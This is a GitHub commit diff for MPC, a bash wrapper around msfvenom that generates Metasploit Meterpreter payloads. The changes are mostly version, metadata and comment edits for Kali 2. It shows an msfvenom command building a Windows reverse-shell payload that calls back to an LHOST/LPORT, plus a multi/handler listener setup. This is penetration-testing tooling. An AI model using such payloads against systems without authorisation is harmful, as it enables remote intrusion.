Skip to content

Commit 28fef0a

Browse files
committed
v1.3.3: Kali 2 support
1 parent eca0d69 commit 28fef0a

File tree

2 files changed

+8
-8
lines changed

2 files changed

+8
-8
lines changed

README.md

+2-2
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).
1+
A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework).
22

33
![Msfvenom Payload Creator (MPC)](https://i.imgur.com/JwSYBRZ.png)
44

@@ -18,7 +18,7 @@ The only necessary input from the user should be **defining the payload** they w
1818
* **Want to generate one of each payload? No issue!** Try: `loop`.
1919
* **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)!
2020

21-
_Note: This will **not** try to bypass any anti-virus solutions._
21+
_Note: This will **not** try to bypass any anti-virus solutions in any modes._
2222

2323
## Install
2424

mpc.sh

100755100644
+6-6
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,12 @@
11
#!/bin/bash
22
#-Metadata----------------------------------------------------#
3-
# Filename: mpc.sh (v1.3.2) (Update: 2015-08-17) #
3+
# Filename: mpc.sh (v1.3.3) (Update: 2015-11-06) #
44
#-Info--------------------------------------------------------#
55
# Quickly generate Metasploit payloads using msfvenom. #
66
#-Author(s)---------------------------------------------------#
77
# g0tmilk ~ https://blog.g0tmi1k.com/ #
88
#-Operating System--------------------------------------------#
9-
# Designed for & tested on: Kali Linux & Metasploit v4.11+ #
9+
# Designed for & tested on: Kali Linux 2 & Metasploit v4.11+ #
1010
#-Licence-----------------------------------------------------#
1111
# MIT License ~ http://opensource.org/licenses/MIT #
1212
#-Notes-------------------------------------------------------#
@@ -141,7 +141,7 @@ function doAction {
141141

142142
cat <<EOF > "${FILEHANDLE}"
143143
#
144-
# RUN: service postgresql start;service metasploit start; msfconsole -q -r "${FILENAME}"
144+
# RUN: systemctl start postgresql; msfdb start; msfconsole -q -r "${FILEHANDLE}"
145145
#
146146
use exploit/multi/handler
147147
set PAYLOAD ${PAYLOAD}
@@ -715,16 +715,16 @@ elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; t
715715
CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
716716
doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
717717

718-
# Batch/Loop modes
718+
## Batch/Loop modes
719719
elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then
720720
#SUCCESS=true
721721
exit 0
722722

723-
# Blank input
723+
## Blank input
724724
elif [[ -z "${TYPE}" ]]; then
725725
echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}"
726726

727-
# Unexected input
727+
## Unexpected input
728728
else
729729
echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2
730730
fi

0 commit comments

Comments
 (0)